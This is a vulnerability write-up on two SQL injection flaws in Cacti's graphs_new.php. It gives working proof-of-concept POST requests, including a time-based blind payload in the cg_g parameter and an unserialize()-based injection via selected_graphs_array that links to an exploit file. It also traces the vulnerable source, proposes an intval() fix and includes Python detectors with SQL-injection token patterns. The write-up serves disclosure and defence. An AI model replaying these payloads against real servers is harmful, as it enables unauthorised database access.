Cacti /graphs_new.php SQL Injection Vulnerability

Contents

. Vulnerability Description

. Trigger Conditions

. Affected Scope

. Vulnerable Code Analysis

. Mitigation

. Offense/Defense Notes

1. Vulnerability Description

Another SQL injection vulnerability in Cacti, reachable through graphs_new.php, was found and reported as bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. Trigger Conditions

Both PoCs below run against an authenticated session: the request carries a valid Cacti session cookie and the matching __csrf_magic token, so the attacker needs an account that can reach graphs_new.php. The cookie and token values shown are the ones from the reporter's test instance.

0x1: POC1: SQL Inject (cg_g)

    POST /cacti/graphs_new.php HTTP/1.1
    Host: 192.168.217.133
    Proxy-Connection: keep-alive
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://192.168.217.133
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    DNT: 1
    Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
    Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
    Content-Length: 189

    __csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

The payload is the cg_g parameter, 033926697 xor (select(0)from(select sleep(5))v). It is a time-based blind injection: a response delayed by roughly five seconds confirms that the value reached the graph_templates query unescaped (see the analysis of form_save() and host_new_graphs() in section 4).

0x2: POC2: Object Inject (selected_graphs_array)

. Log in.

. POST http://target/cacti/graphs_new.php

  Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=&host_id=&selected_graphs_array=[injection]

  {Injection exp can be found on my server: http://pandas.pw/cacti.exp}

. MySQL log: select graph_template_id from snmp_query_graph where id= and benchmark(,sha1())--

Here selected_graphs_array is handed to unserialize() as-is, and the snmp_query_graph_id taken from the resulting array is what ends up after id= in the logged query (see 4. 0x1).
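As an added example (not from the original post and not Cacti code), the following Python scans constructed records modelled on the two PoCs above: decoded POST bodies for graphs_new.php and statements from the MySQL general query log. It flags a cg_g value that is not purely numeric, a selected_graphs_array value carrying a serialized-object marker or SQL tokens, and either vulnerable SELECT whose id is not a bare integer. The sample records, the serialized value and the benchmark arguments are constructed for the example; the only parameter and table names used are the ones on this page.

```python
import re
from urllib.parse import parse_qs

# Constructed sample records modelled on the two PoCs above; they are not real captures.
# ("post", body)  : an application/x-www-form-urlencoded body sent to graphs_new.php
# ("mysql", query): a statement as it appears in the MySQL general query log
SAMPLE_RECORDS = [
    ("post", "__csrf_magic=sid%3Aabc%2C1450241184"
             "&cg_g=033926697+xor+(select(0)from(select+sleep(5))v)"
             "&save_component_graph=1&host_id=2&host_template_id=0&action=save"),
    ("post", "__csrf_magic=sid%3Aabc%2C1448716384&action=save&save_component_new_graphs=&host_id="
             "&selected_graphs_array=a%3A1%3A%7Bs%3A2%3A%22sg%22%3Bs%3A18%3A%221+and+sleep(5)--+-%22%3B%7D"),
    ("post", "cg_g=12&save_component_graph=1&host_id=2&host_template_id=0&action=save"),
    ("mysql", "select graph_template_id from snmp_query_graph where id=1 and benchmark(5000000,sha1(1))--"),
    ("mysql", "select name from graph_templates where id=7"),
]

# Time-based and comment-style markers used by both PoCs.
SQLI_TOKENS = re.compile(r"sleep\s*\(|benchmark\s*\(|\bxor\b|\bunion\b|--|/\*", re.IGNORECASE)
# The two SELECTs that graphs_new.php builds by string concatenation; id must be a bare integer.
ID_SINK = re.compile(r"from\s+(snmp_query_graph|graph_templates)\s+where\s+id\s*=\s*(.*)$", re.IGNORECASE)


def scan_post_body(body):
    """Findings (rule, detail) for one form body posted to graphs_new.php."""
    findings = []
    params = parse_qs(body, keep_blank_values=True)
    # cg_g skips the ^cg_(\d+)$ regex in form_save(); the legitimate form only sends an integer here.
    for v in params.get("cg_g", []):
        if not v.isdigit():
            findings.append(("cg_g_not_numeric", v))
    # selected_graphs_array is unserialize()d verbatim: a serialized object ("O:") or SQL tokens
    # inside it have no legitimate use.
    for v in params.get("selected_graphs_array", []):
        if "O:" in v or SQLI_TOKENS.search(v):
            findings.append(("selected_graphs_array_tampered", v))
    # Generic fallback for every other parameter.
    for k, values in params.items():
        if k in ("cg_g", "selected_graphs_array"):
            continue
        for v in values:
            if SQLI_TOKENS.search(v):
                findings.append(("sqli_token", f"{k}={v}"))
    return findings


def scan_mysql_query(query):
    """Flag either vulnerable sink when what follows `id=` is not a plain integer."""
    m = ID_SINK.search(query)
    if m and re.fullmatch(r"\d+\s*;?", m.group(2)) is None:
        return [("non_integer_id_in_sink", m.group(2))]
    return []


def scan(records):
    """Run the matching scanner over each (source, text) record."""
    out = []
    for source, text in records:
        hits = scan_post_body(text) if source == "post" else scan_mysql_query(text)
        out.extend((source, rule, detail) for rule, detail in hits)
    return out


if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(hit)
```

The cg_g rule is the precise one: the form only ever submits a graph template id there, so a non-numeric value is hostile by definition. The MySQL-side rule needs the general query log enabled and catches the injection after the fact, whichever parameter carried it.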

3. Affected Scope

4. Vulnerable Code Analysis

0x1: Vuln-1: Object Injection to SQL Injection

/graphs_new.php

    /* set default action */
    if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }

    switch ($_REQUEST["action"]) {
        case 'save':
            // track function form_save
            form_save();
            break;
        case 'query_reload':
            host_reload_query();
            header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
            break;
        default:
            include_once("./include/top_header.php");
            graphs();
            include_once("./include/bottom_footer.php");
            break;
    }

Following the 'save' action into form_save():

    function form_save() {
        ..
        if (isset($_POST["save_component_new_graphs"])) {
            // track function host_new_graphs_save()
            host_new_graphs_save();
            header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
        }
    }

And from there into host_new_graphs_save():

    function host_new_graphs_save() {
        // $selected_graphs_array is the unserialize()d POST parameter: attacker-controlled, no filtering.
        // (Feeding untrusted data to unserialize() is PHP object injection in its own right, usable
        // whenever a suitable gadget class is loaded; that is independent of the SQL sink below.)
        $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
        ..
        // The nested array is walked, and the snmp_query_graph_id taken from it is concatenated
        // straight into the SELECT, which is the SQL injection.
        $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
        ..
    }

0x2: Vuln-2: SQL Injection via cg_g

    function form_save() {
        if (isset($_POST["save_component_graph"])) {
            /* summarize the 'create graph from host template/snmp index' stuff into an array */
            while (list($var, $val) = each($_POST)) {
                if (preg_match('/^cg_(\d+)$/', $var, $matches)) {
                    $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
                }
                // cg_g is not filtered: the submitted value is used verbatim as the array key.
                // The `> 0` test does not help: PHP compares the leading-numeric string
                // "033926697 xor (...)" as the number 33926697, so the check passes.
                elseif (preg_match('/^cg_g$/', $var)) {
                    if ($_POST["cg_g"] > 0) {
                        $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
                    }
                }
                elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) {
                    $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
                }
            }
            if (isset($selected_graphs)) {
                // the external input is passed on to host_new_graphs()
                host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
                exit;
            }
            header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
        }
        if (isset($_POST["save_component_new_graphs"])) {
            host_new_graphs_save();
            header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
        }
    }

Following the call into host_new_graphs():

    function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
        /* we use object buffering on this page to allow redirection to another page if no
           fields are actually drawn */
        ob_start();
        include_once("./include/top_header.php");
        print "\n";
        $snmp_query_id = 0;
        $num_output_fields = array();
        while (list($form_type, $form_array) = each($selected_graphs_array)) {
            while (list($form_id1, $form_array2) = each($form_array)) {
                if ($form_type == "cg") {
                    // SQL injection: $form_id1 is the array key, i.e. the raw cg_g value
                    $graph_template_id = $form_id1;
                    html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");
                    ..

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt

http://bugs.cacti.net/view.php?id=2652

5. Mitigation

Cast both sink values to an integer before they are concatenated into the query. Note what this does and does not cover: intval() closes the two SQL sinks, but selected_graphs_array is still handed to unserialize() unfiltered, so untrusted data keeps reaching the deserializer. Upgrading to a release that carries the fix (link below) is the practical answer rather than hand-patching.

/graphs_new.php

    function host_new_graphs_save() {
        ..
        /* before: */
        /* $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]); */
        /* after: */
        $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
        ..
    }

/graphs_new.php

    function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
        /* we use object buffering on this page to allow redirection to another page if no
           fields are actually drawn */
        ob_start();
        include_once("./include/top_header.php");
        print "\n";
        $snmp_query_id = 0;
        $num_output_fields = array();
        while (list($form_type, $form_array) = each($selected_graphs_array)) {
            while (list($form_id1, $form_array2) = each($form_array)) {
                if ($form_type == "cg") {
                    $graph_template_id = $form_id1;
                    /* added: cast before the value is used in the query */
                    $graph_template_id = intval($graph_template_id);
                    html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");
                    ..
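To make the difference between the two versions concrete, here is an added Python model (not Cacti code and not from the original post) of the cg_g branch of form_save() and of the id sink in host_new_graphs(). php_intval() and php_gt_zero() are assumed approximations of PHP 5's intval() and of its loose string-to-integer comparison, not PHP itself. The model shows why the existing `> 0` check does not stop the PoC value, what the vulnerable concatenation produces, and what the intval() fix turns it into; the same cast is the fix for snmp_query_graph_id in host_new_graphs_save(). is_well_formed_id() is a stricter check of my own, not part of the patch.

```python
import re

# Assumption: these two helpers approximate PHP 5 semantics; they are not PHP.
_LEADING_INT = re.compile(r"^\s*([+-]?\d+)")


def php_intval(value):
    """PHP intval() on a string: the leading decimal integer, or 0 if there is none."""
    m = _LEADING_INT.match(value)
    return int(m.group(1)) if m else 0


def php_gt_zero(value):
    """PHP 5 `$value > 0` for a string: a leading-numeric string is compared numerically,
    so '033926697 xor ...' compares as 33926697 and the check passes."""
    return php_intval(value) > 0


def is_well_formed_id(value):
    """Stricter check (my addition, not in Cacti): a positive integer with no leading zero."""
    return re.fullmatch(r"[1-9][0-9]*", value) is not None


def collect_selected_graphs(post):
    """Mirror of the key-parsing loop in form_save(): the cg_N branch is regex-checked,
    the cg_g branch uses the submitted value verbatim as the array key."""
    selected = {}
    for var in post:
        m = re.fullmatch(r"cg_(\d+)", var)
        if m:
            selected.setdefault("cg", {}).setdefault(m.group(1), {})[m.group(1)] = True
        elif var == "cg_g" and php_gt_zero(post["cg_g"]):
            key = post["cg_g"]
            selected.setdefault("cg", {}).setdefault(key, {})[key] = True
    return selected


def template_query_vulnerable(graph_template_id):
    """Vulnerable version: the array key is concatenated into the SELECT unchanged."""
    return "select name from graph_templates where id=" + graph_template_id


def template_query_fixed(graph_template_id):
    """Patched version: intval() before concatenation, so only digits reach the query."""
    return "select name from graph_templates where id=%d" % php_intval(graph_template_id)


def sink_queries(post, fixed=False):
    """Walk the cg branch as host_new_graphs() does and return the SQL it would execute."""
    build = template_query_fixed if fixed else template_query_vulnerable
    return [build(form_id1) for form_id1 in collect_selected_graphs(post).get("cg", {})]


# Constructed request modelled on POC1 (session and CSRF fields omitted; they play no part here).
POC_POST = {
    "cg_g": "033926697 xor (select(0)from(select sleep(5))v)",
    "save_component_graph": "1",
    "host_id": "2",
    "host_template_id": "0",
    "action": "save",
}

if __name__ == "__main__":
    print(sink_queries(POC_POST))               # injected SQL reaches the database
    print(sink_queries(POC_POST, fixed=True))   # id=33926697, injection neutralised
    print(is_well_formed_id(POC_POST["cg_g"]))  # the strict check would reject the value
```

intval() makes the query safe but silently turns "033926697 xor ..." into 33926697, so an attack attempt degrades into a harmless lookup and leaves no trace in application behaviour. Rejecting anything that does not match [1-9][0-9]* (and logging it) is the stricter option, and a prepared statement with a bound integer removes the string-building altogether.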

Relevant Link:

http://www.cacti.net/download_cacti.php

6. Offense/Defense Notes

Copyright (c) 2016 Little5ann All rights reserved
